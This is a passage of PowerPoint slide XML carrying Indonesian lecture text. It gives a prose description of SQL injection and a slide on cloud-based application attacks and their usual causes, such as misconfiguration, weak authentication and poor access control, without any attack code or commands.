              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pernyataan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komentar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mem-parsing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</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182</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91175972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Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihosting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di platform cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dibandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tradisional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakteristik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebingungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meninggalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>celah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sifat cloud yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menarik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tradisional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
